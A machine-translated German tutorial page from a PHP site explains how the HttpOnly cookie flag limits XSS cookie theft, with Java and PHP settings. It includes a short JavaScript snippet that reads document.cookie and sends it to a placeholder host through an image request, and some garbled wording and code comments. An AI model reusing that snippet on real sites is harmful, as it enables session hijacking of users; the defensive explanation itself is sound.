简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Heim > Backend-Entwicklung > PHP-Tutorial > Hauptteil

PHP verwendet httponly, um XSS-Angriffe zu verhindern

怪我咯
Freigeben: 2023-03-13 18:36:01
Original
2142 Leute haben es durchsucht

  1. Was ist HttpOnly?

    Wenn Sie das HttpOnly-Attribut in Cookie festlegen, werden die Cookie-Informationen nicht über das JS-Skript gelesen. Dies gilt für Um XSS-Angriffe zu verhindern, suchen Sie bitte auf Google nach einer genaueren Einführung

  2. Wird die API von JavaEE unterstützt?

Derzeit hat Sun die entsprechende API nicht angekündigt, aber PHP und C# haben sie implementiert. Brüder, die sich mit JavaEE beschäftigen, sind ziemlich deprimiert, keine Sorge, es gibt unten Workarounds

3. HttpOnly-Einstellungsbeispiel

javaEE
response.setHeader("Set-Cookie", "cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
Nach dem Login kopieren

In diesem Artikel wird hauptsächlich PHP für die XSS-Verteidigung vorgestellt Verwenden Sie httponly, um zu verhindern, dass auf einer Website beliebiger JS-Code ausgeführt werden kann. Das Erschreckendste ist, dass Angreifer JS verwenden, um

Cookie

oder Sitzung zu entführen enthält eine große Menge vertraulicher Informationen (Identitätsinformationen, Administratorinformationen) usw., das ist alles. . . Die folgenden js erhalten Cookie-Informationen:

Der Code lautet wie folgt:

Allgemeine Cookies werden jetzt aus dem Dokument
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
Nach dem Login kopieren
Objekt

abgerufen Beim Setzen von Cookies wird im Allgemeinen ein Parameter namens HttpOnly akzeptiert, genau wie Domäne und andere Parameter. Sobald dieser HttpOnly gesetzt ist, wird das Cookie nicht im Dokumentobjekt des Browsers angezeigt.
PHP-Einstellungen HttpOnly
:

Für PHP-Versionen vor PHP5.1: 
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
Nach dem Login kopieren

Schließlich ist HttpOnly kein Allheilmittel! 
header("Set-Cookie: hidden=value; httpOnly");
Nach dem Login kopieren

Das obige ist der detaillierte Inhalt vonPHP verwendet httponly, um XSS-Angriffe zu verhindern. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
httponly php 攻击
Quelle:php.cn
Vorheriger Artikel:PHP springt automatisch zum Beispielcode für chinesische und englische Seiten Nächster Artikel:So implementieren Sie das intelligente Zuschneiden von Bildern mit PHP Codeigniter
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Neueste Artikel des Autors
Aktuelle Ausgaben
Nginx-Konfigurations- und Cookie-Probleme Jetzt hat der Server ein Cookie gesetzt, auf das nur ein bestimmter Domänenname zugreifen ...
Aus 2017-07-03 11:43:15
0
1
705
node.js - 是不是不能删除 httpOnly 的 Cookie 我的应用是由node和express搭建的,执行下面代码,其中 xxxxx 是 httpOnly 的,结果是:uname 删除了,xxxxx没有被删除。所以,不能删除 httpOn...
Aus 2017-04-17 13:10:41
0
3
487
javascript - 请教一个关于chrome cookie获取的问题? 为了安全,服务器会把cookie的某些值设置为httpOnly,这样客户端就不能通过javascript的document.cookie拿到这些cookie值。 但是在chrome...
Aus 2017-04-11 12:39:38
0
1
310
verwandte Themen
Mehr>
Beliebte Empfehlungen
Beliebte Tutorials
Mehr>
Verwandte Tutorials
Beliebte Empfehlungen
Aktuelle Kurse
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage
Über uns Haftungsausschluss Sitemap
Chinesische PHP-Website:Online-PHP-Schulung für das Gemeinwohl,Helfen Sie PHP-Lernenden, sich schnell weiterzuentwickeln!